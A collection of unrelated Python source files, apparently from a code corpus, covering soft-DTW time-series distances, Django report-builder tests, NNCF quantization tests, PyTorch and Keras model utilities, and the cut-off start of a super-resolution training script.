gamma=1.): r"""Compute Soft-DTW metric between two time series. Soft-DTW was originally presented in [1]_ and is discussed in more details in our :ref:`user-guide page on DTW and its variants<dtw>`. Soft-DTW is computed as: .. math:: \text{soft-DTW}_{\gamma}(X, Y) = \min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2 where :math:`\min^\gamma` is the soft-min operator of parameter :math:`\gamma`. In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a hard-min operator and soft-DTW is defined as the square of the DTW similarity measure. Parameters ---------- ts1 A time series ts2 Another time series gamma : float (default 1.) Gamma paraneter for Soft-DTW Returns ------- float Similarity Examples -------- >>> soft_dtw([1, 2, 2, 3], ... [1., 2., 3., 4.], ... gamma=1.) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS -0.89... >>> soft_dtw([1, 2, 3, 3], ... [1., 2., 2.1, 3.2], ... gamma=0.01) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS 0.089... See Also -------- cdist_soft_dtw : Cross similarity matrix between time series datasets References ---------- .. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for Time-Series," ICML 2017. """ if gamma == 0.: return dtw(ts1, ts2) ** 2 return SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]), gamma=gamma).compute() def soft_dtw_alignment(ts1, ts2, gamma=1.): r"""Compute Soft-DTW metric between two time series and return both the similarity measure and the alignment matrix. Soft-DTW was originally presented in [1]_ and is discussed in more details in our :ref:`user-guide page on DTW and its variants<dtw>`. Soft-DTW is computed as: .. math:: \text{soft-DTW}_{\gamma}(X, Y) = \min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2 where :math:`\min^\gamma` is the soft-min operator of parameter :math:`\gamma`. In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a hard-min operator and soft-DTW is defined as the square of the DTW similarity measure. Parameters ---------- ts1 A time series ts2 Another time series gamma : float (default 1.) Gamma paraneter for Soft-DTW Returns ------- numpy.ndarray Soft-alignment matrix float Similarity Examples -------- >>> a, dist = soft_dtw_alignment([1, 2, 2, 3], ... [1., 2., 3., 4.], ... gamma=1.) # doctest: +ELLIPSIS >>> dist -0.89... >>> a # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE array([[1.00...e+00, 1.88...e-01, 2.83...e-04, 4.19...e-11], [3.40...e-01, 8.17...e-01, 8.87...e-02, 3.94...e-05], [5.05...e-02, 7.09...e-01, 5.30...e-01, 6.98...e-03], [1.37...e-04, 1.31...e-01, 7.30...e-01, 1.00...e+00]]) See Also -------- soft_dtw : Returns soft-DTW score alone References ---------- .. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for Time-Series," ICML 2017. """ if gamma == 0.: path, dist = dtw_path(ts1, ts2) dist_sq = dist ** 2 a = numpy.zeros((ts_size(ts1), ts_size(ts2))) for i, j in path: a[i, j] = 1. else: sdtw = SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]), gamma=gamma) dist_sq = sdtw.compute() a = sdtw.grad() return a, dist_sq def cdist_soft_dtw(dataset1, dataset2=None, gamma=1.): r"""Compute cross-similarity matrix using Soft-DTW metric. Soft-DTW was originally presented in [1]_ and is discussed in more details in our :ref:`user-guide page on DTW and its variants<dtw>`. Soft-DTW is computed as: .. math:: \text{soft-DTW}_{\gamma}(X, Y) = \min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2 where :math:`\min^\gamma` is the soft-min operator of parameter :math:`\gamma`. In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a hard-min operator and soft-DTW is defined as the square of the DTW similarity measure. Parameters ---------- dataset1 A dataset of time series dataset2 Another dataset of time series gamma : float (default 1.) Gamma paraneter for Soft-DTW Returns ------- numpy.ndarray Cross-similarity matrix Examples -------- >>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01) array([[-0.01098612, 1. ], [ 1. , 0. ]]) >>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]], ... [[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01) array([[-0.01098612, 1. ], [ 1. , 0. ]]) See Also -------- soft_dtw : Compute Soft-DTW cdist_soft_dtw_normalized : Cross similarity matrix between time series datasets using a normalized version of Soft-DTW References ---------- .. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for Time-Series," ICML 2017. """ dataset1 = to_time_series_dataset(dataset1, dtype=numpy.float64) self_similarity = False if dataset2 is None: dataset2 = dataset1 self_similarity = True else: dataset2 = to_time_series_dataset(dataset2, dtype=numpy.float64) dists = numpy.empty((dataset1.shape[0], dataset2.shape[0])) equal_size_ds1 = check_equal_size(dataset1) equal_size_ds2 = check_equal_size(dataset2) for i, ts1 in enumerate(dataset1): if equal_size_ds1: ts1_short = ts1 else: ts1_short = ts1[:ts_size(ts1)] for j, ts2 in enumerate(dataset2): if equal_size_ds2: ts2_short = ts2 else: ts2_short = ts2[:ts_size(ts2)] if self_similarity and j < i: dists[i, j] = dists[j, i] else: dists[i, j] = soft_dtw(ts1_short, ts2_short, gamma=gamma) return dists def cdist_soft_dtw_normalized(dataset1, dataset2=None, gamma=1.): r"""Compute cross-similarity matrix using a normalized version of the Soft-DTW metric. Soft-DTW was originally presented in [1]_ and is discussed in more details in our :ref:`user-guide page on DTW and its variants<dtw>`. Soft-DTW is computed as: .. math:: \text{soft-DTW}_{\gamma}(X, Y) = \min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2 where :math:`\min^\gamma` is the soft-min operator of parameter :math:`\gamma`. In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a hard-min operator and soft-DTW is defined as the square of the DTW similarity measure. This normalized version is defined as: .. math:: \text{norm-soft-DTW}_{\gamma}(X, Y) = \text{soft-DTW}_{\gamma}(X, Y) - \frac{1}{2} \left(\text{soft-DTW}_{\gamma}(X, X) + \text{soft-DTW}_{\gamma}(Y, Y)\right) and ensures that all returned values are positive and that :math:`\text{norm-soft-DTW}_{\gamma}(X, X) = 0`. Parameters ---------- dataset1 A dataset of time series dataset2 Another dataset of time series gamma : float (default 1.) Gamma paraneter for Soft-DTW Returns ------- numpy.ndarray Cross-similarity matrix Examples -------- >>> time_series = numpy.random.randn(10, 15, 1) >>> numpy.alltrue(cdist_soft_dtw_normalized(time_series) >= 0.) True See Also -------- soft_dtw : Compute Soft-DTW cdist_soft_dtw : Cross similarity matrix between time series datasets using the unnormalized version of Soft-DTW References ---------- .. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for Time-Series," ICML 2017. """ dists = cdist_soft_dtw(dataset1, dataset2=dataset2, gamma=gamma) d_ii = numpy.diag(dists) dists -= .5 * (d_ii.reshape((-1, 1)) + d_ii.reshape((1, -1))) return dists class SoftDTW: def __init__(self, D, gamma=1.): """ Parameters ---------- gamma: float Regularization parameter. Lower is less smoothed (closer to true DTW). Attributes ---------- self.R_: array, shape = [m + 2, n + 2] Accumulated cost matrix (stored after calling `compute`). """ if hasattr(D, "compute"): self.D = D.compute() else: self.D = D self.D = self.D.astype(numpy.float64) # Allocate memory. # We need +2 because we use indices starting from 1 # and to deal with edge cases in the backward recursion. m, n = self.D.shape self.R_ = numpy.zeros((m + 2, n + 2), dtype=numpy.float64) self.computed = False self.gamma = numpy.float64(gamma) def compute(self): """Compute soft-DTW by dynamic programming. Returns ------- sdtw: float soft-DTW discrepancy. """ m, n = self.D.shape _soft_dtw(self.D, self.R_, gamma=self.gamma) self.computed = True return self.R_[m, n] def grad(self): """Compute gradient of soft-DTW w.r.t. D by dynamic programming. Returns ------- grad: array, shape = [m, n] Gradient w.r.t. D. """ if not self.computed: raise ValueError("Needs to call compute() first.") m, n = self.D.shape # Add an extra row and an extra column to D. # Needed to deal with edge cases in the recursion. D = numpy.vstack((self.D, numpy.zeros(n))) D = numpy.hstack((D, numpy.zeros((m + 1, 1)))) # Allocate memory. # We need +2 because we use indices starting from 1 # and to deal with edge cases in the recursion. E = numpy.zeros((m + 2, n + 2), dtype=numpy.float64) _soft_dtw_grad(D, self.R_, E, gamma=self.gamma) return E[1:-1, 1:-1] class SquaredEuclidean: def __init__(self, X, Y): """ Parameters ---------- X: array, shape = [m, d] First time series. Y: array, shape = [n, d] Second time series. Examples -------- >>> SquaredEuclidean([1, 2, 2, 3], [1, 2, 3, 4]).compute() array([[0., 1., 4., 9.], [1., 0., 1., 4.], [1., 0., 1., 4.], [4., 1., 0., 1.]]) """ self.X = to_time_series(X).astype(numpy.float64) self.Y = to_time_series(Y).astype(numpy.float64) def compute(self): """Compute distance matrix. Returns ------- D: array, shape = [m, n] Distance matrix. """ return euclidean_distances(self.X, self.Y, squared=True) def jacobian_product(self, E): """Compute the product between the Jacobian (a linear map from m x d to m x n) and a matrix E. Parameters ---------- E: array, shape = [m, n] Second time series. Returns ------- G: array, shape = [m, d] Product with Jacobian ([m x d, m x n] * [m x n] = [m x d]). """ G = numpy.zeros_like(self.X, dtype=numpy.float64) _jacobian_product_sq_euc(self.X, self.Y, E.astype(numpy.float64), G) return G
498004
from django.contrib.contenttypes.models import ContentType from django.conf import settings from django.test import TestCase from ..utils import ( get_properties_from_model, get_direct_fields_from_model, get_relation_fields_from_model, get_model_from_path_string) from ..mixins import GetFieldsMixin from ..models import Report, DisplayField, FilterField from report_builder_demo.demo_models.models import ( Bar, Restaurant, Waiter, Comment, Place) class RelationUtilityFunctionTests(TestCase): def test_a_initial_rel_field_name(self): """ Test that the initial assumption about the ManyToOneRel field_name is correct """ field_name = ( Waiter.restaurant.field.rel.field_name if hasattr(Waiter.restaurant.field, 'rel') else Waiter.restaurant.field.target_field.name ) self.assertEquals(field_name, "place") def test_get_relation_fields_from_model_does_not_change_field_name(self): """ Make sure that getting related_fields doesn't overwrite field_name Waiter has a ForeignKey to Restaurant. The relation from Restaurant to Waiter is a ManyToOneRel object. 'place' is the PK of Restaurant. The ManyToOneRel field_name should be the same at the PK, unless to_field is set on the ForeignKey. ManyToManyRel objects are not affected. """ get_relation_fields_from_model(Restaurant) field_name = ( Waiter.restaurant.field.rel.field_name if hasattr(Waiter.restaurant.field, 'rel') else Waiter.restaurant.field.target_field.name ) self.assertEquals(field_name, "place") # Waiter.restaurant.field.rel.get_related_field() class UtilityFunctionTests(TestCase): def setUp(self): self.report_ct = ContentType.objects.get_for_model(Report) self.report = Report.objects.create( name="foo report", root_model=self.report_ct) self.filter_field = FilterField.objects.create( report=self.report, field="X", field_verbose="stuff", filter_type='contains', filter_value='Lots of spam') def get_fields_names(self, fields): return [field.name for field in fields] def test_get_relation_fields_from_model(self): fields = get_relation_fields_from_model(Report) names = self.get_fields_names(fields) self.assertTrue('displayfield' in names or 'report_builder:displayfield' in names) self.assertTrue('filterfield' in names or 'report_builder:filterfield' in names) self.assertTrue('root_model' in names) self.assertEquals(len(names), 7) def test_get_model_from_path_string(self): result = get_model_from_path_string(Restaurant, 'waiter__name') self.assertEqual(result, Waiter) def test_get_model_from_path_string_one_to_one(self): """Test that one-to-one relationships don't break this function""" result = get_model_from_path_string(Restaurant, 'place__serves_pizza') self.assertEqual(result, Place) def test_get_direct_fields_from_model(self): fields = get_direct_fields_from_model(Report) names = self.get_fields_names(fields) self.assertTrue('created' in names) self.assertTrue('description' in names) self.assertTrue('distinct' in names) self.assertTrue('id' in names) self.assertEquals(len(names), 9) def test_get_fields(self): """ Test GetFieldsMixin.get_fields """ obj = GetFieldsMixin() obj.get_fields( Bar, "foos", ) def test_get_gfk_fields_from_model(self): fields = get_direct_fields_from_model(Comment) def test_get_properties_from_model(self): properties = get_properties_from_model(DisplayField) self.assertEquals(properties[0]['label'], 'choices') self.assertEquals(properties[1]['label'], 'choices_dict') def test_filter_property(self): # Not a very complete test - only tests one type of filter result = self.filter_field.filter_property('spam') self.assertTrue(result) def test_custom_global_model_manager(self): """ test for custom global model manager """ if getattr(settings, 'REPORT_BUILDER_MODEL_MANAGER', False): self.assertEquals( self.report._get_model_manager(), settings.REPORT_BUILDER_MODEL_MANAGER) def test_custom_model_manager(self): """ test for custom model manager """ if getattr( self.report.root_model.model_class(), 'report_builder_model_manager', True ): # change setup to use actual field and value self.filter_field.field = 'name' self.filter_field.filter_value = 'foo' self.filter_field.save() # coverage of get_query objects = self.report.get_query() # expect custom manager to return correct object with filters self.assertEquals(objects[0], self.report)
498077
import os from itertools import product import auditing_args from collections import defaultdict BATCH_SIZE = 50 data_dir = auditing_args.args["save_dir"] h5s = [fname for fname in os.listdir(data_dir) if fname.endswith('.h5')] def get_cfg(h5): splt = h5.split('-') if 'no' in h5: return ('no', '.', splt[2], splt[3], splt[4]) else: return ('new', splt[1], splt[2], splt[3], splt[4]) cfg_map = defaultdict(list) for h5 in h5s: cfg_map[get_cfg(h5)].append(h5) args = {d: len(cfg_map[d]) for d in cfg_map if len(cfg_map[d]) > 0} print(args) all_exp = [] def run_exp(cmd): cmd = "CUDA_VISIBLE_DEVICES= "+cmd print(cmd) os.system(cmd) fmt_cmd = "python make_nps.py {} {} {} {} {} {} {}" for arg in args: for start in range(0, args[arg], BATCH_SIZE): cmd = fmt_cmd.format(arg[0], start, start + BATCH_SIZE, arg[1], arg[2], arg[3], arg[4]) all_exp.append(cmd) print(len(args), len(all_exp)) import multiprocessing as mp p = mp.Pool(16) p.map(run_exp, all_exp)
498095
from .conv import conv_layer, norm_layer, ConvModule from .nms import multiclass_nms from .anchor_generator import AnchorGenerator from .bbox import delta2bbox, bbox2result __all__ = ['conv_layer', 'norm_layer', 'ConvModule', 'nms', 'AnchorGenerator', 'delta2bbox', 'multiclass_nms', 'bbox2result']
498111
from .bitmovin_error import BitmovinError from .bitmovin_api_error import BitmovinApiError from .invalid_status_error import InvalidStatusError from .invalid_type_error import InvalidTypeError from .unique_constraint_violation_error import UniqueConstraintViolationException from .missing_argument_error import MissingArgumentError from .functionality_not_available_error import FunctionalityNotAvailableError from .timeout_error import TimeoutError
498117
import torch import gym import numpy as np from .utils import make_tensor class TorchModel(torch.nn.Module): """Base class for all pytorch models""" def __init__(self, observation_space): """Initializes the model with the given observation space Currently supported observation spaces are: - Box spaces - A tuple of box spaces, where the 1st one is the 'main' observation, and the rest contain additional 1D vectors of linear features for the model which are fed to one of the non-convolutional layers (Usually the RNN layer) """ super().__init__() # When using multiple actors each with it's own CPU copy of the model, # we need to limit them to be single-threaded otherwise they slow each # other down. This should not effect training time if training is on # the GPU torch.set_num_threads(1) self._setup_inputs(observation_space) def _setup_inputs(self, obs_space): """Sets up the input sizes based on the given observation space""" assert(isinstance(obs_space, (gym.spaces.Box, gym.spaces.Tuple))), \ "TorchModel currently only supports Box or Tuple as the " \ "observation space" if isinstance(obs_space, gym.spaces.Box): # Basic case of just a single box space, no extra input features self.main_input_shape = obs_space.shape self.extra_input_shape = None else: # For now we just support the basic case where all spaces are Box # (i.e. no nested tuple spaces), and only the 1st space is the main # space, while the rest of the spaces are 1D extra feature vectors assert(np.all([ isinstance(space, gym.spaces.Box) for space in obs_space.spaces])), \ "TorchModel only supports tuples of boxes as the observation "\ "space" # TODO: Support multiple main spaces and nested tuples?? assert(np.all( [len(space.shape) == 1 for space in obs_space.spaces[1:]])), \ "TorchModel currently only supports 1D box spaces for the " \ " non-main observation space" self.main_input_shape = obs_space.spaces[0].shape self.extra_input_shape = ( np.sum([space.shape for space in obs_space.spaces[1:]]),) def _get_inputs(self, inp): """Returns the the input separated into the 'main input' and the 'extra inputs' (If applicable, i.e. if it's a tuple observation space) """ if not isinstance(inp, tuple): return (inp, None) else: return (inp[0], torch.cat(inp[1:], dim=-1)) def is_recurrent(self): raise NotImplementedError def set_layer_preprocessor(self, layer_index, preprocessor): raise NotImplementedError
498136
from ..qemu_config import QemuArchParams QEMU_ARCH = QemuArchParams(linux_arch='x86_64', kconfig=''' CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y''', qemu_arch='x86_64', kernel_path='arch/x86/boot/bzImage', kernel_command_line='console=ttyS0', extra_qemu_params=[''])
498162
from abc import ABC from pathlib import Path from typing import Dict import pytest from torch import nn from nncf import NNCFConfig from nncf.common.quantization.structs import QuantizerConfig from nncf.torch.quantization.algo import QuantizationController from tests.common.helpers import TEST_ROOT from tests.torch.sample_test_validator import SampleType from tests.torch.sample_test_validator import SanitySampleValidator from tests.torch.sample_test_validator import SanityTestCaseDescriptor class PrecisionTestCaseDescriptor(SanityTestCaseDescriptor, ABC): def __init__(self): super().__init__() self.num_weight_quantizers_: int = 0 self.num_activation_quantizers_: int = 0 @property def config_directory(self) -> Path: return TEST_ROOT.joinpath("torch", "data", "configs", "hawq") def get_precision_section(self) -> Dict: raise NotImplementedError def get_compression_section(self): quantization_section = { 'algorithm': 'quantization', 'initializer': { 'precision': self.get_precision_section(), 'range': { "num_init_samples": 2 }, "batchnorm_adaptation": { "num_bn_adaptation_samples": 1 } }, } if self.sample_type_ == SampleType.CLASSIFICATION_STAGED: quantization_section.update({'params': {"activations_quant_start_epoch": 0}}) return quantization_section def num_weight_quantizers(self, n: int): self.num_weight_quantizers_ = n return self def num_activation_quantizers(self, n: int): self.num_activation_quantizers_ = n return self class PrecisionSampleValidator(SanitySampleValidator): def __init__(self, desc: PrecisionTestCaseDescriptor): super().__init__(desc) self._train_mock = None def setup_spy(self, mocker): train_location = self._sample_handler.get_train_location() self._train_mock = mocker.patch(train_location) # Need to mock SafeMLFLow to prevent starting a not closed mlflow session due to memory leak of config and # SafeMLFLow, which happens with a mocked train function self._sample_handler.mock_mlflow(mocker) def validate_spy(self): self._train_mock.assert_called_once() class HAWQTestCaseDescriptor(PrecisionTestCaseDescriptor): def __init__(self): super().__init__() self.batch_size_init_: int = 0 def get_validator(self): return HAWQSampleValidator(self) def batch_size_init(self, batch_size_init: int): self.batch_size_init_ = batch_size_init return self def get_sample_params(self): result = super().get_sample_params() result.update({'batch_size_init': self.batch_size_init_} if self.batch_size_init_ else {}) return result def get_precision_section(self) -> Dict: return {"type": "hawq", "num_data_points": 3, "iter_number": 1} def __str__(self): bs = f'_bs{self.batch_size_init_}' if self.batch_size_init_ else '' return super().__str__() + '_hawq' + bs class HAWQSampleValidator(PrecisionSampleValidator): def __init__(self, desc: HAWQTestCaseDescriptor): super().__init__(desc) self._desc = desc self.get_qsetup_spy = None self.hessian_trace_estimator_spy = None def setup_spy(self, mocker): super().setup_spy(mocker) from nncf.torch.quantization.init_precision import HAWQPrecisionInitializer self.get_qsetup_spy = mocker.spy(HAWQPrecisionInitializer, "get_quantizer_setup_for_qconfig_sequence") from nncf.torch.quantization.hessian_trace import HessianTraceEstimator self.hessian_trace_estimator_spy = mocker.spy(HessianTraceEstimator, "__init__") def validate_spy(self): super().validate_spy() qconfig_sequence = self.get_qsetup_spy.call_args[0][1] assert len(qconfig_sequence) == self._desc.num_weight_quantizers_ all_precisions = {qc.num_bits for qc in qconfig_sequence} # with default compression ratio = 1.5 all precisions should be different from the default one assert all_precisions != {QuantizerConfig().num_bits} init_data_loader = self.hessian_trace_estimator_spy.call_args[0][5] expected_batch_size = self._desc.batch_size_init_ if self._desc.batch_size_init_ else self._desc.batch_size_ assert init_data_loader.batch_size == expected_batch_size class AutoQTestCaseDescriptor(PrecisionTestCaseDescriptor): def __init__(self): super().__init__() self.subset_ratio_: float = 1.0 self.BITS = [2, 4, 8] self.debug_dump: bool = False def get_validator(self): return AutoQSampleValidator(self) def subset_ratio(self, subset_ratio_: float): self.subset_ratio_ = subset_ratio_ return self def dump_debug(self, debug_dump: bool): self.debug_dump = debug_dump return self def get_precision_section(self) -> Dict: return {"type": "autoq", "bits": self.BITS, "iter_number": 2, "compression_ratio": 0.15, "eval_subset_ratio": self.subset_ratio_, "dump_init_precision_data": self.debug_dump} def __str__(self): sr = f'_sr{self.subset_ratio_}' if self.subset_ratio_ else '' dd = '_dump_debug' if self.debug_dump else '' return super().__str__() + '_autoq' + sr + dd class AutoQSampleValidator(PrecisionSampleValidator): def __init__(self, desc: AutoQTestCaseDescriptor): super().__init__(desc) self._desc = desc self.builder_spy = None def setup_spy(self, mocker): super().setup_spy(mocker) from nncf.torch.quantization.algo import QuantizationBuilder self.builder_spy = mocker.spy(QuantizationBuilder, 'build_controller') def validate_spy(self): super().validate_spy() ctrl = self.builder_spy.spy_return final_bits = [qm.num_bits for qm in ctrl.all_quantizations.values()] assert set(final_bits) != {QuantizerConfig().num_bits} assert all(bit in self._desc.BITS for bit in final_bits) def resnet18_desc(x: PrecisionTestCaseDescriptor): return x.config_name("resnet18_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \ mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(21).num_activation_quantizers(27) def inception_v3_desc(x: PrecisionTestCaseDescriptor): return x.config_name("inception_v3_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \ mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(95).num_activation_quantizers(105) def ssd300_vgg_desc(x: PrecisionTestCaseDescriptor): return x.config_name("ssd300_vgg_voc_mixed_int.json").sample_type(SampleType.OBJECT_DETECTION). \ mock_dataset('voc').batch_size(3).num_weight_quantizers(35).num_activation_quantizers(27) def unet_desc(x: PrecisionTestCaseDescriptor): return x.config_name("unet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \ mock_dataset('camvid').batch_size(3).num_weight_quantizers(23).num_activation_quantizers(23) def icnet_desc(x: PrecisionTestCaseDescriptor): return x.config_name("icnet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \ mock_dataset('camvid').batch_size(3).num_weight_quantizers(64).num_activation_quantizers(81) TEST_CASE_DESCRIPTORS = [ inception_v3_desc(HAWQTestCaseDescriptor()), inception_v3_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED), resnet18_desc(HAWQTestCaseDescriptor()), resnet18_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED), resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)), resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)).sample_type(SampleType.CLASSIFICATION_STAGED), ssd300_vgg_desc(HAWQTestCaseDescriptor()), ssd300_vgg_desc(HAWQTestCaseDescriptor().batch_size_init(2)), unet_desc(HAWQTestCaseDescriptor()), unet_desc(HAWQTestCaseDescriptor().batch_size_init(2)), icnet_desc(HAWQTestCaseDescriptor()), inception_v3_desc(AutoQTestCaseDescriptor()).batch_size(2), inception_v3_desc(AutoQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED), resnet18_desc(AutoQTestCaseDescriptor()).batch_size(2), resnet18_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2).sample_type( SampleType.CLASSIFICATION_STAGED), resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).batch_size(2), resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).sample_type(SampleType.CLASSIFICATION_STAGED), ssd300_vgg_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2), unet_desc(AutoQTestCaseDescriptor().dump_debug(True)), icnet_desc(AutoQTestCaseDescriptor()) ] @pytest.fixture(name='precision_desc', params=TEST_CASE_DESCRIPTORS, ids=map(str, TEST_CASE_DESCRIPTORS)) def fixture_precision_desc(request, dataset_dir): desc: PrecisionTestCaseDescriptor = request.param return desc.finalize(dataset_dir) def test_precision_init(precision_desc: PrecisionTestCaseDescriptor, tmp_path, mocker): validator = precision_desc.get_validator() args = validator.get_default_args(tmp_path) validator.validate_sample(args, mocker) class ExportTestCaseDescriptor(PrecisionTestCaseDescriptor): def get_validator(self): return ExportSampleValidator(self) def get_precision_section(self) -> Dict: return {} def get_sample_params(self): result = super().get_sample_params() result.update({'pretrained': True}) return result class ExportSampleValidator(PrecisionSampleValidator): def __init__(self, desc: ExportTestCaseDescriptor): super().__init__(desc) self._desc = desc self.is_export_called = False self._ctrl_mock = None self._reg_init_args_patch = None self._create_compressed_model_patch = None def setup_spy(self, mocker): super().setup_spy(mocker) self._reg_init_args_patch = mocker.spy(NNCFConfig, "register_extra_structs") sample_location = self._sample_handler.get_sample_location() if self._desc.sample_type_ == SampleType.OBJECT_DETECTION: mocker.patch(sample_location + '.build_ssd') else: load_model_location = sample_location + '.load_model' mocker.patch(load_model_location) ctrl_mock = mocker.MagicMock(spec=QuantizationController) model_mock = mocker.MagicMock(spec=nn.Module) create_model_location = sample_location + '.create_compressed_model' create_model_patch = mocker.patch(create_model_location) if self._desc.sample_type_ == SampleType.CLASSIFICATION_STAGED: mocker.patch(sample_location + '.get_quantization_optimizer') def fn(*args, **kwargs): return ctrl_mock, model_mock create_model_patch.side_effect = fn self._ctrl_mock = ctrl_mock def validate_spy(self): super().validate_spy() self._reg_init_args_patch.assert_called() if self.is_export_called: self._ctrl_mock.export_model.assert_called_once() else: self._ctrl_mock.export_model.assert_not_called() EXPORT_TEST_CASE_DESCRIPTORS = [ resnet18_desc(ExportTestCaseDescriptor()), resnet18_desc(ExportTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED), ssd300_vgg_desc(ExportTestCaseDescriptor()), unet_desc(ExportTestCaseDescriptor()), ] @pytest.fixture(name='export_desc', params=EXPORT_TEST_CASE_DESCRIPTORS, ids=map(str, EXPORT_TEST_CASE_DESCRIPTORS)) def fixture_export_desc(request): desc: PrecisionTestCaseDescriptor = request.param return desc.finalize() @pytest.mark.parametrize( ('extra_args', 'is_export_called'), ( ({}, False), ({"-m": 'export train'}, True) ), ids=['train_with_onnx_path', 'export_after_train'] ) def test_export_behavior(export_desc: PrecisionTestCaseDescriptor, tmp_path, mocker, extra_args, is_export_called): validator = export_desc.get_validator() args = validator.get_default_args(tmp_path) args["--to-onnx"] = tmp_path / 'model.onnx' if extra_args is not None: args.update(extra_args) validator.is_export_called = is_export_called validator.validate_sample(args, mocker)
498197
from plenum.common.constants import DOMAIN_LEDGER_ID from plenum.server.batch_handlers.batch_request_handler import BatchRequestHandler from plenum.server.database_manager import DatabaseManager from plenum.test.plugin.demo_plugin import AUCTION_LEDGER_ID class AuctionBatchHandler(BatchRequestHandler): def __init__(self, database_manager: DatabaseManager): super().__init__(database_manager, AUCTION_LEDGER_ID) def post_batch_applied(self, three_pc_batch, prev_handler_result=None): pass def post_batch_rejected(self, ledger_id, prev_handler_result=None): pass
498213
import logging import numpy from keras.layers import np from keras.utils import Sequence import utils import utils_logging from utils import IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS FRAME_INTERVAL = 15 logger = logging.Logger("LstmImgBatchGenerator") utils_logging.log_info(logger) class LstmImgBatchGenerator(Sequence): def __init__(self, x_paths_to_pictures, y_paths_to_pictures, data_dir: str, sequence_length: int, gray_scale: bool): self.data_dir = data_dir logger.warning("Using hard-coded batch size in lstm img batch generator") self.batch_size = 4 self.x_paths_to_pictures = x_paths_to_pictures self.y_paths_to_pictures = y_paths_to_pictures self.sequence_length = sequence_length self.gray_scale= gray_scale def __getitem__(self, index): start_index = index * self.batch_size end_index = start_index + self.batch_size this_batch_x_paths = self.x_paths_to_pictures[start_index:end_index] this_batch_y_paths = self.y_paths_to_pictures[start_index:end_index] assert this_batch_x_paths.size == this_batch_y_paths.size assert this_batch_x_paths[0][1] == this_batch_y_paths[0][0] x_images = self.empty_batch_array(this_batch_x_paths) for i, paths in enumerate(this_batch_x_paths): x = self.load_paths_to_images(paths=paths) x_images[i] = x y_images = self.empty_batch_array(this_batch_y_paths) for i, paths in enumerate(this_batch_y_paths): x = x_images[i] x_sublist = x[1:] last_y = paths[len(paths)-1] last_img = self.load_paths_to_images(numpy.asarray([last_y])) y = numpy.concatenate((x_sublist, last_img)) assert len(x) == len(y) y_images[i] = y assert numpy.array_equal(x_images[0][1], y_images[0][0]) return x_images, y_images def empty_batch_array(self, this_batch_y_paths): return np.empty([len(this_batch_y_paths), self.sequence_length, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS]) def load_paths_to_images(self, paths): images = np.empty([len(paths), IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS]) for k, path in enumerate(paths): images[k] = utils.load_img_from_path(data_dir=self.data_dir, image_name=path, is_gray_scale=self.gray_scale) return images def get_single_sequence(self, index): x = self.x_paths_to_pictures[index] x_imgs = [] x_imgs.append(self.load_paths_to_images(x)) x_imgs = numpy.array(x_imgs) # Low performance implementation, but this is not relevant as we're only using the method for manual check y = self.y_paths_to_pictures[index] y_imgs = self.load_paths_to_images(y) assert len(y_imgs) == self.sequence_length next_image = y_imgs[self.sequence_length - 1] return x_imgs, next_image def __len__(self): return (len(self.x_paths_to_pictures ) - FRAME_INTERVAL)// self.batch_size def get_batch_size(self): return self.batch_size
498255
from __future__ import print_function import os import time from datetime import datetime import math import argparse import logging import pickle import yaml import cv2 as cv import numpy as np # from skimage.measure.simple_metrics import compare_psnr import torch import torch.nn as nn import torch.optim as optim import torch.backends.cudnn as cudnn from torch.utils.data import DataLoader from torch.utils.tensorboard import SummaryWriter from data.youku import SISRDataset from model.WDSR_A import MODEL from models.modules.RRDBNet_arch import RRDBNet # Training settings parser = argparse.ArgumentParser(description='PyTorch Super Res Example') parser.add_argument('--yaml_path', type=str, default="./settings.yaml", help='配置文件路径') args = parser.parse_args() with open(args.yaml_path, 'r') as yf: opt = yaml.load(yf) cudnn.benchmark = True cuda = opt['hardware']['cuda'] logger = logging.getLogger('base') print(opt) if cuda and not torch.cuda.is_available(): raise Exception("No GPU found, please run without --cuda") torch.manual_seed(opt['hardware']['seed']) if cuda: 